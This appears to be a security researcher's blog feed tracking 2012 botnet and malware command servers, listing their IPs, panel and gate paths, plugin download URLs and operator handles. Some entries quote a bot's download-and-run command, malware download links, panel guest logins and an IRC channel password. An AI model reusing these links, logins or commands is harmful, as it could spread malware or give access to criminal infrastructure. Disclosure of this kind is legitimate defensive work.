ALiSs has found a new net Server: 74.208.111.48 Port: 1866 Channel: #!h! * Topic for #!h! is: .load /99/106/112/81/55/59/40/105/121/99/108/102/45/111/98/115/102/103/110/97/108/101/120/8/64/119/114/53/122/126/122/126/117/113/100/83/46/112/124/64/40/46/102/126/105/ * Topic for #!h! set by wweras at Fri Dec 14 20:55:55 2012 Hosting infos: http://whois.domaintools.com/74.208.111.48
freetraffcounter.com (Click fraud botnet hosted by worldstream.nl)
Resolved freetraffcounter.com to 109.236.87.219 This is from the same guy as all the installs stuff I just posted, but it was downloaded separately using the smoke loader so I gave it a post of it’s own. The bot first gets the ad link information from the freetraffcounter.com site. The link information is stored in javascriptRead more...
adzu324nbasmdaoias.su (Smokeloader http botnet hosted by istanbuldc.com)
Resolved adzu324nbasmdaoias.su to 185.4.227.98 Server: adzu324nbasmdaoias.su Gate file: /wp/index.php Guest login: adzu324nbasmdaoias.su/wp/guest.php guest:guest Hosting infos: http://whois.domaintools.com/185.4.227.98
beerpigfarm.ru (Installs crap hosted by Santex.net)
Resolved beerpigfarm.ru to 46.166.130.216 I found a file on h4r3’s latest andromeda that downloaded a bunch of crap from this site. hxxp://beerpigfarm.ru/smo Smoke loader, posted here hxxp://beerpigfarm.ru/min is a bitcoin miner, uses 50btc Mining info: http://169TpR47JVcLaQXdGYE6Lv4Ps9DbVqHhSi:x@pool.50btc.com:8332 Since he’s using no account mode we can snoop on his mining by plugging in his address on theRead more...
group-gz.me (Andromeda http botnet hosted by Panamaserver.com)
Resolved group-gz.me to 190.123.47.198 Server: group-gz.me Gate file: /.daci/perete.php Plugins Rootkit: group-gz.me/.daci/r.pack Socks: group-gz.me/.daci/s.pack Formgrabber: group-gz.me/.daci/f.pack Gate file: group-gz.me/.daci/fg.php This guy is installing the recently posted survey winlocker on his bots. Hosting infos: http://whois.domaintools.com/190.123.47.198
honey.punked.us (Andromeda http botnet hosted by kimsufi.com
Resolved honey.punked.us to 94.23.213.78 Server: honey.punked.us Gate file: /sex/image.php Plugins Rootkit: http://doncarlosmayorista.com/.sec/r.pack Socks: http://doncarlosmayorista.com/.sec/s.pack Formgrabber: http://doncarlosmayorista.com/.sec/f.pack Gate file: honey.punked.us/sex/fg.php This is the new andromeda of the french hecker h4r3. Now he’s using cracked andromeda with free domains. Hosting infos: http://whois.domaintools.com/94.23.213.78
64.56.64.29(ngr botnet hosted in United States Los Angeles Perfect International In)
server: 64.56.64.29:1887 server: 174.37.172.71:1887server: 184.172.60.181:1887server: 5.153.6.203 TCP:1887Server Password:Username: hxfyijcNickname: n{DE|XPa}hxfyijcChannel: #pool (Password: leonis) Cannel:#r3Channeltopic: :~pu hxxp://hotfile.com/dl/184384511/5b0f4b2/omaigato.exe 765cce9dee5448f58d9e798d91dbf809 ~s -o ~s find more infos about the owner and domains searching for 1887 in this blog downloaded samples: hxxp://199.7.177.244/dl/184384734/6e6cd1d/all.exe==>downloads these links:hxxp://80.86.83.93/index (2musicaonline.com)hxxp://80.86.83.93/Emo-Screamo/ (2musicaonline.com) hxxp://hotfile.com/dl/184299133/b91a140/8346g527rg239gth34t24t.html thanks to aLiSs the turkish kebap for submiting samples hosting infos: http://whois.domaintools.com/64.56.64.29
img197-imageshack.info (Andromeda http botnet and Spyeye banking malware hosted by ecatel.net)
Resolved img197-imageshack.info to 93.174.90.96 Server: img197-imageshack.info Gate file: /panel/image.php Spyeye Server: img197-imageshack.info Gate file: /gate.php Login: /admin.php Bonus silence winlocker crap: img197-imageshack.info/bl/eu.php Hosting infos: http://whois.domaintools.com/93.174.90.96
unlockyourdesktop.info (Winlocker hosted by nerdie.net)
Resolved unlockyourdesktop.info to 199.96.156.208 Yet another survey based winlocker. This one follows the established pattern of ukash and moneypack winlockers by loading a webpage that contains the surveys rather than simply loading the offers like the previous variants. Winlocker site showing offers This version does not appear to do anything to prevent the use ofRead more...
zxz.consulting-info.eu (Multiple http botnets hosted by France Roubaix Ovh Sas)
Resolved zxz.consulting-info.eu to 5.39.71.80 This is the french hecker known as h4r3 who has been posted before Andromeda This is the same andromeda net that was posted before, just with the rest of the domains. Previous/disabled domains vvv.exp1oit.in xxx.be-shopping.net Current domain: zxz.consulting-info.eu Gate file: /service/image.php Plugins: Rootkit: tbontepaard.nl/gllr/r.pack Socks: tbontepaard.nl/gllr/s.pack kbot Server: zxz.consulting-info.eu GateRead more...